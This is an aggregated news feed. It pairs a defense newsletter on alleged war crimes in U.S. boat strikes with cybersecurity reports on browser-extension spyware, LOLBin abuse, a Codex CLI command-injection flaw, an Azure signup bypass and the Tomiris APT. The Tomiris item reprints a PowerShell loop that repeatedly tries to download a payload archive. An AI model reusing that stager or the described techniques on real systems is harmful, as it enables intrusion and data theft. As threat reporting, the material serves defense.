• “Kill everybody.” Several key bipartisan U.S. lawmakers are warning the U.S. military may have committed war crimes when it launched its first attacks against alleged drug-trafficking boats around Latin America on Sept. 2, according to reporting Friday from Alex Horton and Ellen Nakashima of the Washington Post.  

    Rewind: After the very first U.S. strike, at least two survivors were seen still alive and “clinging to the smoldering wreck” of their destroyed boat, according to the Post’s reporting, which cited seven people with knowledge of the event. Eleven people had been on the boat when the military first hit it with a missile. When a drone feed revealed the two survivors moments later, the Joint Special Operations commander overseeing the strikes at the time—Navy Adm. Frank Bradley—ordered a second strike to kill them, and the “two men were blown apart in the water,” according to the Post

    Defense Secretary Pete Hegseth had delivered a spoken directive to “kill everybody” on the boat, a person with direct knowledge of the operation told the Post. It’s not clear that Hegseth was aware of the survivors; but his subordinates were reportedly keen on following orders since, as the Post reports, Bradley “ordered the second strike to fulfill Hegseth’s directive that everyone must be killed.” (Bradley has since been placed in command of U.S. Special Operations Command, which oversees JSOC.) “If the video of the blast that killed the two survivors on Sept. 2 were made public, people would be horrified, said one person who watched the live feed,” the newspaper reports. 

    If the reporting is true, it would appear the U.S. military violated Section 5.4.7 of the Defense Department’s Law of War Manual (PDF), which states “it is prohibited to order that legitimate offers of surrender will be refused or that detainees, such as unprivileged belligerents, will be summarily executed.” The manual continues, “Moreover, it is also prohibited to conduct hostilities on the basis that there shall be no survivors, or to threaten the adversary with the denial of quarter. This rule is based on both humanitarian and military considerations. This rule also applies during non-international armed conflict.”

    Notable: Hegseth did not dispute the account; but he did call the Post’s reporting “fabricated, inflammatory, and derogatory,” writing Friday on social media, and insisted “Our current operations in the Caribbean are lawful under both U.S. and international law.” 

    New: Both the House and Senate Armed Services Committee leaders announced investigations into the allegations. From the Senate side, “The Committee has directed inquiries to the Department, and we will be conducting vigorous oversight to determine the facts related to these circumstances,” Roger Wicker, R-Miss., and Jack Reed, D-R.I., said in a joint statement, The Hill reported Saturday morning. 

    HASC leaders also vowed “bipartisan action to gather a full accounting of the operation in question,” according to a joint statement from Chairman Mike Rogers, R-Ala., and Adam Smith, D-Wash., Saturday afternoon. “This committee is committed to providing rigorous oversight of the Department of Defense’s military operations in the Caribbean. We take seriously the reports of follow-on strikes on boats alleged to be ferrying narcotics in the SOUTHCOM region,” they said. (And for what it’s worth, “The two committees referred to the Department of Defense by that name, rather than by the ‘Department of War’ rebrand Hegseth and Trump have pushed,” historian Heather Cox Richardson noted Saturday evening.)

    “This rises to the level of a war crime if it's true,” said Sen. Tim Kaine, D-Va., speaking Sunday on “Face the Nation” from CBS News. 

    “Obviously, if that occurred, that would be very serious and I agree that that would be an illegal act,” said Rep. Mike Turner, R-Ohio, speaking Sunday on “Face the Nation” as well. Turner also said the reported events are “completely outside anything that has been discussed with Congress and there is an ongoing investigation.” 

    “We should get to the truth,” said former Air Force Brig. Gen. Don Bacon, R-Neb., speaking Sunday on “This Week” from ABC News. “I don't think he would be foolish enough to make this decision to say, kill everybody, kill the survivors because that's a clear violation of the law of war,” Bacon said. 

    Legal POV: “[T]here can be no conceivable legal justification” for what the Post’s reporting alleges, argues former Pentagon counsel Jack Goldsmith, writing Friday on Substack. 

    President Trump’s reaction: “He said he did not say that. And I believe him 100%,” the president told reporters aboard Air Force One on Sunday. He then added, “I wouldn't have wanted that, not a second strike.” 

    • By the way: The 10th chapter in Hegseth’s book is titled, “More lethality, less lawyers,” Anna Bower of Lawfare noted on social media. “It’s almost as if the signs were there all along,” she added. 

    Latest: Hegseth appeared to be trying to make light of the allegations, posting a meme about the alleged war crime to social media on Sunday evening using an AI-generated image based on the children’s book series, Franklin the turtle. At least two Franklin-based memes were shared by users in response, here and here, emphasizing the legal stakes of Hegseth’s war on drug boats. 

    Additional reading:Trump’s Focus on Drug War Means Big Business for Defense Startups” in the business of selling drones, sensors and AI-based surveillance platforms to the military, the Wall Street Journal reported Saturday. 


    Welcome to this Monday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1969, the U.S. held its first military draft lottery since the Second World War. 

    Ukraine

    Peace-talks update: Ukraine won’t give up land, says the country’s chief negotiator. “As long as Zelensky is president, no one should count on us giving up territory. He will not sign away territory,” Andriy Yermak told The Atlantic’s Simon Shuster by telephone from Kyiv last week. “The constitution prohibits this.”

    Ukraine “is prepared to discuss only where the line should be drawn to demarcate what the warring sides control,” Shuster wrote, quoting Yermak as saying, “All we can realistically talk about right now is really to define the line of contact…And that’s what we need to do.” Read on, here.

    Russia launched Trump’s peace plan with promises of profits. The Wall Street Journal reports. “For the Kremlin, the Miami talks were the culmination of a strategy, hatched before Trump’s inauguration, to bypass the traditional U.S. national security apparatus and convince the administration to view Russia not as a military threat but as a land of bountiful opportunity, according to Western security officials. By dangling multibillion-dollar rare-earth and energy deals, Moscow could reshape the economic map of Europe—while driving a wedge between America and its traditional allies.”

    Putin’s negotiator, Kirill Dmitriev, told Trump envoy Steve Witkoff and son-in-law Jared Kushner that U.S. companies might “tap the roughly $300 billion of Russian central bank assets, frozen in Europe, for U.S.-Russian investment projects and a U.S.-led reconstruction of Ukraine. U.S. and Russian companies could join to exploit the vast mineral wealth in the Arctic.” Read the quintuple(!)-bylined WSJ article, here.

    Rep. Don Bacon: “We saw that Wall Street Journal article yesterday that many people around the president are hoping to make billions of dollars—these are all billionaires in their own right—from…Russia, if they get a favorable agreement with Ukraine. That alarms me tremendously,” the former Air Force one-star told ABC’s “This Week” on Sunday. 

    “Putin’s the invader, he’s the dictator, he’s murdered all his opponents. But I just don’t see that moral clarity coming from the White House,” he continued. “I don’t want to see a foreign policy based on greed. I want to see it based on doing the right thing.”

    Historian reax: “The Trump administration is replacing American democracy with a kleptocracy, a system of corruption in which a network of ruling elites use the institutions of government to steal public assets for their own private gain,” warned Heather Richardson of Boston College, writing Sunday. “It permits virtually unlimited theft while the head of state provides cover for his cronies through pardons and the uneven application of the law. It is the system Russia’s president Vladimir Putin exploits in Russia, and President Donald J. Trump is working to establish it in the United States of America.”

    Additional reading: 

    Around the Defense Department

    Space Force won’t say who got money to start developing orbital interceptors. The amounts are small—under $9.5 million apiece—which exempts them from disclosure requirements, but at least some of them are likely to lead to contracts worth billions of dollars. Several experts said the secrecy that surrounds the wildly ambitious Golden Dome project has several drawbacks. Defense One’s Thomas Novelly reports, here.

    The Navy detected plutonium in the air at a shuttered San Francisco shipyard a year before it told anyone. Pu-239 was detected at an “Action Level” at the former Hunters Point Naval Shipyard in November 2024, but only revealed in October. “On this issue we did not do a good job,” Michael Pound, the Navy’s environmental coordinator overseeing the site’s clean-up, said at a recent community meeting. The Guardian has more, here.

    D.C. Guard shooting

    A National Guardman is “fighting for his life” after the Wednesday shooting that left another dead in Washington, D.C. Air Force Staff Sgt. Andrew Wolfe is hospitalized in critical condition, West Virginia Gov. Patrick Morrisey said Saturday on “Fox & Friends.” 

    Army Spc. Sarah Beckstrom died on Thanksgiving, one day after the attack. Arrested: Rahmanullah Lakanwal, an Afghan national, has been charged with first-degree murder. USA Today has more, here.

    Commentary:A Terrible and Avoidable Tragedy in D.C.,” is how former Homeland Security official Juliette Kayyem described the shooting, writing  the day after in The Atlantic.

    Additional reading: 

    Overseas

    Germany is raising its defenses, following an 1,800-page playbook. WSJ: “The blueprint details how as many as 800,000 German, U.S. and other NATO troops would be ferried eastward toward the front line. It maps the ports, rivers, railways and roads they would travel, and how they would be supplied and protected on the way.”

    The logistics plan is part of an “‘all-of-society’ approach to war,” that marks “a return to a Cold-War mindset, but updated to account for new threats and hurdles—from Germany’s decrepit infrastructure to inadequate legislation and a smaller military—that didn’t exist at the time.” Read on, here

    Additional reading: “Taiwan puts $40 billion toward building a defense dome and buying US weapons,” the Associated Press reported on Wednesday.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • “ShadyPanda,” a sophisticated threat actor responsible for a seven-year campaign that has successfully infected 4.3 million Chrome and Edge users.

    By exploiting the inherent trust in browser marketplaces, ShadyPanda weaponized “Featured” and “Verified” extensions to deploy remote code execution (RCE) backdoors and massive spyware operations without triggering traditional security alarms.

    The investigation reveals that ShadyPanda’s strategy relied on patience rather than immediate exploitation. The group operated legitimate extensions, such as “Clean Master,” for years to build a user base and earn a trusted status from Google and Microsoft.

    Malicious Clean Master
    Malicious Clean Master

    In mid-2024, after building a user base of 300,000, they pushed a silent, malicious update.

    This update transformed the extensions into hourly RCE vehicles. Every infected browser now checks a command-and-control server (api.extensionplay[.]com) each hour, downloading and executing arbitrary JavaScript with full browser privileges.

    This mechanism allows the actor to dynamically switch payloads from surveillance today to potential ransomware or credential theft tomorrow, completely bypassing static analysis.

    4.3 Million Chrome and Edge Users Hacked

    While the RCE operation was surgical, ShadyPanda’s Phase 4 campaign is on an industrial scale. Five active extensions in the Microsoft Edge marketplace, including the popular “WeTab,” are currently being used by over 4 million users.

    Unlike the removed Chrome extensions, these Edge add-ons remain live. They actively collect comprehensive browser fingerprints, search queries, and full URLs, transmitting the data to servers in China, including Baidu and private infrastructure .

    The malware captures mouse clicks with pixel-level precision and exfiltrates browsing history in real-time, effectively turning enterprise and personal browsers into open surveillance devices .

    Based on the Koi Security report, here is a detailed breakdown of the specific data points collected and exfiltrated by the ShadyPanda malware campaigns.

    Data Exfiltration method
    Data Exfiltration Method
    Data CategorySpecific Details CollectedCampaign / SourceExfiltration Method
    Browsing Activity– Complete URL history of every visited site
    – HTTP Referrers (showing navigation origin)
    – Navigation patterns and timestamps
    Phase 3 (Clean Master)
    Phase 4 (WeTab)
    Encrypted AES (Phase 3)
    Real-time transmission (Phase 4)
    User Input & Search– Search queries (Google, Bing, etc.)
    – Real-time keystrokes (capturing typos & corrections)
    – Pre-search intent (profiling before “Enter” is hit)
    Phase 2 (Infinity V+)
    Phase 4 (WeTab)
    Unencrypted HTTP (Phase 2)
    Transmitted to Baidu/WeTab servers (Phase 4)
    Device Fingerprinting– User Agent strings
    – Operating System & Platform
    – Screen resolution & Timezone settings
    – System language
    Phase 3
    Phase 4
    Used to build unique profiles that survive anti-tracking tools
    Behavioral Biometrics– Mouse click coordinates (X/Y positions)
    – Specific page elements clicked
    – Scroll behavior and depth
    – Active time spent on specific pages
    Phase 4 (WeTab)High-frequency logging sent to surveillance servers in China
    Identity & Storage– Persistent UUID4 identifiers (survives browser restarts)
    – Content of localStorage and sessionStorage
    – Browser Cookies (enabling session hijacking)
    Phase 2
    Phase 3
    Phase 4
    – Persistent UUID4 identifiers (survive browser restarts)
    – Content of localStorage and sessionStorage
    – Browser Cookies (enabling session hijacking)

    ShadyPanda’s success highlights a critical flaw in the browser security model: trust is static, but code is dynamic. By passing an initial review and waiting years to weaponize the auto-update pipeline, the actor bypassed the primary defense mechanism of the Chrome and Edge stores.

    The auto-update feature, designed to keep users secure, became the vector that delivered the infection directly behind enterprise firewalls.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post 4.3 Million Chrome and Edge Users Hacked in 7-Year ShadyPanda Malware Campaign appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals have found a more effective method to compromise Windows computers while evading detection by security software.

    Ivan Spiridonov observed that uploading malicious tools, hackers are now using legitimate Windows programs already installed on target systems, a tactic known as “living off the land” (LOLBins, or Living Off the Land Binaries).​

    Unlike traditional attacks that rely on external tools like Mimikatz or PowerShell Empire, which are easily detected by endpoint detection and response (EDR) solutions.

    Why This Method Works

    This new approach leverages Microsoft-signed programs such as PowerShell, Windows Management Instrumentation (WMI), Certutil, and BitAdmin.

    These tools are trusted by default because system administrators use them every day for legitimate work.

    The appeal is straightforward: security software typically flags suspicious files, but Windows’ built-in tools are signed by Microsoft and allowed by default.

    When attackers use these legitimate programs for malicious purposes, their activity blends seamlessly with normal administrative operations, making detection nearly impossible without sophisticated behavioral analysis.​

    A red team operator discovered this advantage firsthand during a security assessment. After uploading a password-dumping tool to a Windows machine, security staff detected and blocked the attack within 15 minutes.

    But when using only built-in Windows utilities, the same operator-maintained access for three weeks, moved across 15 different systems, and extracted data without triggering a single security alert.​

    Common Living Off the Land Techniques

    Attackers use various native Windows tools for different objectives. PowerShell handles reconnaissance and command execution.

    WMI enables remote system queries and process creation. Scheduled tasks provide persistence without the need for suspicious executables. And Windows services enable long-term access with system-level privileges.​

    Criminals use Certutil to download files, BitAdmin for background transfers, DNS for covert tunneling, and even email applications to exfiltrate sensitive information.​

    Security teams face a nearly impossible challenge: they cannot simply block these tools because their own IT staff depends on them for normal operations.

    Disabling PowerShell would break automation scripts. Removing WMI would damage system management capabilities.

    This creates a fundamental dilemma: allow these tools and accept the risk, or block them and cripple legitimate business functions.​

    Defense requires a fundamental shift away from signature-based detection toward comprehensive logging and behavioral analysis.

    Utility / FeatureMalicious FunctionWhy It Evades Detection
    PowerShellEnables remote command execution on other systems.It is a trusted Microsoft automation tool, so malicious scripts look like normal IT operations .
    WMI (Windows Management Instrumentation)Abused to download malicious payloads from the internet or exfiltrate stolen data.Used for reconnaissance, dumping credentials, and moving laterally across the network.
    Certutil.exeCreates persistent access by setting up jobs that execute attacker code at specific times.It is a legitimate certificate authority utility that is explicitly allowed by most security controls .
    Scheduled TasksUsed to establish persistence and modify system configurations.Malicious tasks are disguised as legitimate system maintenance jobs .
    Windows RegistryMalicious tasks are disguised as legitimate system maintenance jobs.Allows attackers to execute commands without uploading files or using suspicious protocols.

    Security teams need PowerShell script block logging, command-line auditing, WMI activity monitoring, and tools such as Sysmon to track detailed system behavior.​

    Defenders should also implement strict application allow listing policies and monitor unusual process relationships, Ivan Spiridonov added.

    Watch for suspicious network connections from administrative tools, and establish baselines for regular administrative activity.

    These measures can identify when legitimate tools are being abused for malicious purposes, even if individual commands appear normal.​

    As attackers continue evolving their methods, organizations must move beyond blocking known tools and focus instead on detecting suspicious behavior patterns that indicate compromise, regardless of which legitimate application is being misused.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Hackers are Moving to “Living Off the Land” Techniques to Attack Windows Systems Bypassing EDR appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • OpenAI has patched a command injection flaw in its Codex CLI tool that allowed attackers to execute arbitrary commands on developers’ machines simply by getting a malicious configuration file into a project repository.

    The issue, now fixed in Codex CLI version 0.23.0, effectively turned routine use of the codex command into a silent remote‑code‑execution trigger.​

    Codex CLI is OpenAI’s terminal-based coding agent, designed to read, edit, and run code while integrating external tools via the Model Context Protocol (MCP).

    Check Point Research (CPR) discovered that the CLI implicitly trusted project-local configuration, allowing MCP server definitions to be loaded and executed automatically at startup with no user approval.

    This behavior meant ordinary repo files, such as .env and .codex/config.toml, could be transformed into execution primitives.​

    OpenAI Codex CLI Vulnerability

    CPR showed that if a repository contains a .env that sets CODEX_HOME=./.codex, plus a matching ./.codex/config.toml with mcp_servers entries, Codex will resolve its configuration to that folder and immediately run the configured command and arguments whenever codex is launched in that repo.

    There was no secondary validation or re‑approval when those commands changed, so attackers with commit or pull‑request access could plant benign‑looking configs and later swap in malicious payloads.

    In one proof-of-concept, the researchers triggered macOS Calculator as soon as Codex started, illustrating how arbitrary commands fire in the user’s context.

    Because Codex runs with the developer’s privileges, a poisoned repo could silently open reverse shells, exfiltrate SSH keys and cloud tokens, or tamper with source code every time Codex is invoked.

    The attack pathway also lends itself to supply-chain abuse: popular templates, starter repos, or CI pipelines that use Codex could propagate the backdoor to many downstream environments without additional interaction. CPR warns that the flaw effectively collapsed a key security boundary by treating project-controlled files as trusted execution material.​

    CPR privately reported the issue to OpenAI on 7 August 2025, and OpenAI shipped a fix on 20 August 2025 in Codex CLI 0.23.0. The patch blocks .env files from silently redirecting CODEX_HOME into project directories, closing the automatic execution chain demonstrated by the researchers.

    Testing by CPR confirmed the mitigation, and all Codex users are strongly advised to upgrade to version 0.23.0 or later and to treat repository-level MCP configuration as sensitive, review‑required content going forward.​

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post OpenAI Codex CLI Command Injection Vulnerability Let Attackers Execute Arbitrary Commands appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical security vulnerability in Microsoft Azure API Management (APIM) Developer Portal enables attackers to register accounts across different tenant instances, even when administrators have explicitly disabled user signup through the portal interface.

    The flaw, which Microsoft has classified as “by design,” remains unpatched as of December 1, 2025, leaving organizations potentially exposed to unauthorized access.​

    The security issue stems from a fundamental design flaw where disabling signup in the Azure Portal UI only hides the registration form visually, while the underlying /signup API endpoint remains fully active and accessible.

    When Basic Authentication is configured for the Developer Portal, the backend API continues to accept registration requests without validating tenant boundaries or verifying that the request originates from an authorized source.​

    Microsoft Azure API Management Flaw

    Attackers exploit this vulnerability by manipulating the Host header in signup requests. The attack requires access to any APIM instance with signup enabled, including one controlled by the attacker, where they can intercept a legitimate signup request, modify the Host header to point to a target organization’s APIM instance, and successfully create an account despite signup being “disabled” on the victim’s portal.​

    The vulnerability enables several critical security risks, including cross-tenant account creation on any APIM instance with Basic Authentication enabled, complete bypass of administrative access controls, and potential exposure of sensitive API documentation and subscription keys. Organizations that believed they had disabled public registration may unknowingly remain vulnerable to this attack vector.​

    APIM instances are vulnerable if Basic Authentication is configured (regardless of UI settings), the Developer Portal is deployed and accessible, and the service runs on Developer, Basic, Standard, or Premium tiers. The vulnerability has been assigned a CVSS score of 6.5, classified as medium-high severity under CWE-284 (Improper Access Control).​

    Finnish security researcher Mihalis Haatainen of Bountyy Oy discovered the vulnerability on September 30, 2025, and immediately reported it to Microsoft Security Response Center (MSRC).

    After submitting two detailed reports in September and November, Microsoft closed both cases, stating the behavior was “by design” and did not constitute a security vulnerability. The researcher subsequently reported the issue to CERT-FI before publicly disclosing it on November 26, 2025.​

    Since Microsoft has not released a patch, organizations must take immediate action to protect their APIM instances. The most critical step is completely removing the Basic Authentication identity provider from the Azure Portal, not merely disabling signup in the UI.

    Organizations should navigate to their APIM instance, access Developer Portal settings under Identities, and delete the “Username and password” identity provider entirely.​

    Additional protective measures include switching exclusively to Azure Active Directory authentication to enforce proper tenant boundaries, auditing all existing Developer Portal user accounts for unauthorized registrations created after signup was supposedly disabled, and implementing continuous monitoring of signup activity and API calls.

    Security teams can use the publicly available Python verification script and Nuclei template released by the researcher to identify vulnerable instances within their organizations.​

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft Azure API Management Flaw Enables Cross-Tenant Account Creation, Bypassing Admin Restrictions appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Tomiris hacker group has resurfaced with a sophisticated campaign targeting foreign ministries and government entities worldwide.

    Beginning in early 2025, this advanced persistent threat (APT) actor shifted its operational strategy to focus on high-value diplomatic infrastructure.

    By leveraging a diverse array of programming languages—including Go, Rust, C/C++, and Python—the group has enhanced its ability to bypass traditional security measures while maintaining a low profile within compromised networks and persistent environments.

    These attacks typically commence with precision spear-phishing emails containing password-protected archives.

    Attackers frequently disguise malicious executables with double extensions or mislead victims using office document icons, ensuring that the initial infection vector remains obscured.

    The passwords for these archives often follow a predictable pattern, such as “min@2025,” yet this simple obfuscation effectively bypasses automated email scanners.

    Once executed, these payloads initiate a chain of events designed to establish persistence and deploy further malicious tools and backdoors.

    Securelist security analysts noted that Tomiris has increasingly adopted public services like Telegram and Discord for command-and-control (C2) communications.

    This tactical evolution allows malicious traffic to blend seamlessly with legitimate network activity, complicating detection efforts and strategies used by security teams.

    Furthermore, the group has begun deploying open-source post-exploitation frameworks such as Havoc and AdaptixC2, signaling a move toward more modular and resilient attack chains.

    The analysts emphasized that this blend of custom implants and open-source tools makes attribution and mitigation significantly more challenging for defenders.

    The Rust Downloader Mechanism

    A standout component of this campaign is the previously undocumented Tomiris Rust Downloader. Unlike typical data exfiltration tools, this implant performs targeted reconnaissance by scanning specific drives for sensitive file types, including .pdf, .docx, and .xlsx.

    Tomiris Python Discord ReverseShell infection schema (Source - Securelist)
    Tomiris Python Discord ReverseShell infection schema (Source – Securelist)

    Interestingly, it does not immediately steal these files; instead, it compiles a list of file paths and transmits this data to a Discord webhook using a multipart POST request.

    The malware employs a “payload_json” field for system information and a “file” field for the path list, ensuring structured data exfiltration.

    Tomiris Rust Downloader infection schema (Source - Securelist)
    Tomiris Rust Downloader infection schema (Source – Securelist)

    The malware is programmed to avoid detection by ignoring specific directories such as “Program Files,” “Windows,” and “AppData.”

    Upon successfully sending the file list, the downloader creates a Visual Basic script (script.vbs) that executes a PowerShell script (script.ps1).

    This script contains a loop that attempts to retrieve a secondary payload—often a ZIP archive containing further executables—every minute.

    while($true){
        try{
            $Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
            iwr -OutFile $env:Temp\1.zip -Uri $dUrl
            New-Item -Path $env:TEMP\rfolder -ItemType Directory
            break
        }catch{
            Start-Sleep -Seconds 60
        }
    }

    This meticulous approach to reconnaissance and staged delivery highlights the group’s intent to remain undetected while systematically identifying high-value data for future exfiltration and exploitation.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Tomiris Hacker Group Added New Tools and Techniques to Attack Organizations Globally appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Qualcomm Technologies, Inc. has issued an urgent security bulletin warning customers about multiple critical vulnerabilities affecting millions of devices worldwide. The most severe flaw threatens the secure boot process, a fundamental security mechanism that protects devices from malicious software during startup. The security update, published today, addresses six high-priority vulnerabilities discovered in Qualcomm’s proprietary software. […]

    The post Qualcomm Alerts Users to Critical Flaws That Compromise the Secure Boot Process appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers aren’t kicking down the door anymore. They just use the same tools we use every day — code packages, cloud accounts, email, chat, phones, and “trusted” partners — and turn them against us. One bad download can leak your keys. One weak vendor can expose many customers at once. One guest invite, one link on a phone, one bug in a common tool, and suddenly your mail, chats, repos, and

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Chinese government’s cyber ecosystem continues to attract significant scrutiny from security researchers worldwide. Following revelations from Intrusion Truth, the i-Soon leaks, tracking of EagleMsgSpy, and exposure of Great Firewall components, a recent analysis has uncovered details about two technology companies allegedly linked to China’s Ministry of State Security (MSS). BIETA and its subsidiary CIII […]

    The post Chinese Front Companies Offering Advanced Steganography Tools for APT Groups appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A Perth man has been sent to jail for stealing private videos from women and creating a fake Wi-Fi network to trick airline passengers. The 44-year-old’s crimes have shocked the aviation industry and left many victims feeling violated. The Fake Wi-Fi Scheme The trouble started in April 2024 when workers at Qantas spotted something suspicious. […]

    The post Australian Man Jailed for Running Fake Wi-Fi Attacks at Airports and Onboard Flights appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶